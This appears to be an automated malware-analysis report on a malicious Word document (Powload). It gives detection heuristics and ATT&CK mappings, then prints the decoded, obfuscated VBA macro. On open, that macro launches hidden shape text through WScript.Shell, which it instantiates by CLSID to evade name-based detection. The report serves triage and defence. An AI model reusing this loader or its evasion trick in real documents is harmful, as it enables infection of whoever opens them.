MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1218.011 System Binary Proxy Execution: Rundll32
The sample contains a VBA macro that uses the GetObject function to instantiate the dangerous WScript.Shell COM object. This object is then used to execute a complex, obfuscated PowerShell command. The PowerShell command appears to download and execute a second-stage payload from a URL, indicated by the string concatenation and the structure of the command.
Heuristics 9
-
ClamAV: Doc.Malware.Powload-6775323-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6775323-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6806 bytes |
SHA-256: 59096927f01063a6d531abc24a0efba110199dbba5e8d713edde060972cd362e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
109 of 163 identifiers look randomly generated (e.g. 'NarmvINMqnkL') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "qLWJVzw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case EdnbV
Case 171915710
Hmozd = 252445714
vKITZfT = CLng(53884184)
Case 32346758
zsUGkILW = Oct(PQKIKvSBC)
QqKmAppSm = diwYDbcG
Case 320116756
idbkWKk = CDate(zYGiR)
otpFTQ = Int(307001358 * ZjPjUlEiS)
End Select
On Error Resume Next
Select Case pwQwHwzdR
Case 147208844
mQMuHBZw = 276619519
RjWXGq = CLng(249665415)
Case 90566389
jBDlYYO = Oct(iifWOcKcJ)
JFWhnFj = NtaBHLP
Case 304863865
jiinVtHu = CDate(KrCHMv)
MbIACOwBA = Int(75997176 * TdWTHUp)
End Select
Set iNnPa = Shapes("NarmvINMqnkL")
On Error Resume Next
Select Case uaZBYjXFa
Case 2309754
pFHla = 205503100
kfYiITV = CLng(129520066)
Case 291203322
FaAwDSLU = Oct(lfQGI)
dHRPES = jMQOYMRF
Case 207604940
rkAzz = CDate(mnvRZ)
zUYPTfMDE = Int(263971796 * Pqoiouw)
End Select
cYarBTAmPGi = "" + fcIAP + wpJtlt + aYWIO + DPkJK + iNnPa.TextFrame.TextRange.Text + szOfnWvB + BLYbf
On Error Resume Next
Select Case bwCDpzB
Case 46729088
iOYKDUS = 154742898
BVcLLdXR = CLng(210548936)
Case 12300487
OzboO = Oct(WAAEh)
ihROR = lpWAZccz
Case 105486520
ZfYTzzPi = CDate(kwzwRWkU)
witOGj = Int(305416970 * lNawMR)
End Select
On Error Resume Next
Select Case Whjlq
Case 342307649
DsQwrp = 129312861
PimJGi = CLng(193695721)
Case 94406064
kCBfZlX = Oct(qRQjSTwXN)
UaFMQ = CwXBPrbsS
Case 49718789
nwldG = CDate(wBXDkzPnl)
ZIoXXlKdd = Int(92171677 * kzqXNKS)
End Select
On Error Resume Next
Select Case hPwhkLi
Case 111619465
TaBzMnzh = 272522927
bSoGsvat = CLng(136070643)
Case 270553890
zNjCM = Oct(JDBmZbQ)
ivdhu = BuEQC
Case 297611781
GmKRN = CDate(jWMUuzS)
dnwCrYzK = Int(338806946 * LanzDJQAT)
End Select
Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt)
On Error Resume Next
Select Case hNILcORwj
Case 272614853
iPEBQiVV = 110422557
IXJpcq = CLng(192569596)
Case 45411639
fKhua = Oct(WpShWM)
JMJLuG = VjnufZq
Case 338584135
AYnpiKZ = CDate(Udjtp)
otCuN = Int(321273322 * RvWkfvXn)
End Select
On Error Resume Next
Select Case niKHWz
Case 62712291
TQjUBr = 299574856
mjzzwP = CLng(28373123)
Case 133794171
ZzFZrHkb = Oct(ziAlnX)
WTwUaBaO = szUJMY
Case 175096216
awAEqbJws = CDate(sLKBsbMbw)
zGYXq = Int(54366830 * JPSzbHKKq)
End Select
On Error Resume Next
Select Case TqSuVzPp
Case 254953312
SRzFA = 18554173
ToXFNuKo = CLng(174765228)
Case 214726531
vMFcRRj = Oct(jJHwp)
qSuXnvG = hBabj
Case 44710062
IFvQtuZAq = CDate(iZATiMpif)
bPRmkOt = Int(204209981 * CqkZE)
End Select
On Error Resume Next
Select Case ILHuLLkSf
Case 35205140
XWQJQwWn = 95169026
AtrnN = CLng(51610355)
Case 130353324
zVZwREj = Oct(QStXnW)
wLDYzUWF = wqISPHwD
Case 112630638
fjPbELcBj = CDate(urSdL)
cJiUFdQrz = Int(179830947 * OzJTpGwqw)
End Select
Const wMizh = 0
On Error Resume Next
Select Case rFitF
Case 69091941
CImbX = 64553337
UEOAaa = CLng(117841373)
Case 256185431
OkQhQWAo = Oct(ThKAoRPHS)
wzQQiZKpJ = iLlEaUIoc
Case 254955387
IzjEcGUP = CDate(lTIRqhwUm)
FhrrR = Int(47664962 * FZUIaifTn)
End Select
On Error Resume Next
Select Case wPYnm
Case 153911123
UfjfS = 111806296
klvkoQG = CLng(78309060)
Case 316795503
pzNNtR = Oct(zRwFz)
aSEGBpA = sOpdX
Case 184530810
piAmTEzpJ = CDate(bNbfASVl)
VRjKF = Int(146015791 * SwiYjVpRK)
End Select
SKNLli.Run! cYarBTAmPGi, wMizh
On Error Resume Next
Select Case PuhqtZM
Case 99214300
wvzkicV = 303259403
CjINH = CLng(288308409)
Case 118798962
wYYaIh = Oct(NLBSQ)
bGQfpzpUm = msKuS
Case 100331047
mqYhb = CDate(qDpOzWTa)
dNaZs = Int(226264793 * tcrLRm)
End Select
On Error Resume Next
Select Case FEcrjzVY
Case 68880352
VWtVOWSwi = 159733432
XZVLL = CLng(50446225)
Case 204684516
iTqmaJ = Oct(DIOvSmdfc)
nsuMWRcG = iiGfUrp
Case 31625011
iijTMVSJ = CDate(jFOtusfX)
kGIBNf = Int(314139097 * OzctEch)
End Select
On Error Resume Next
Select Case SGSKm
Case 298416984
kESCTnbpu = 207580043
TjwWHJIYZ = CLng(59435681)
Case 137644640
cssnE = Oct(BmJzXl)
CoHdzUQwr = sKvwJBOU
Case 232688174
zqJbAW = CDate(ttlWLKW)
VBuco = Int(26556528 * lJzcIO)
End Select
On Error Resume Next
Select Case HjwSdjVD
Case 247477994
ltJQHiE = 34883385
fVuOTK = CLng(62508234)
Case 31716602
wiCqw = Oct(iYDItirw)
PHcjElL = LpQLNS
Case 187534503
UiUEH = CDate(vviljbv)
hnWYwL = Int(221072836 * AOnNqAh)
End Select
On Error Resume Next
Select Case XjaYisz
Case 311681866
ZfuOYk = 306694237
TSuutlcKv = CLng(166535911)
Case 292192121
clEtD = Oct(wUULp)
mtnPX = FuqmQ
Case 62710060
jizwO = CDate(TEvqnaAK)
naXIdo = Int(51301277 * wMmqTzJpU)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.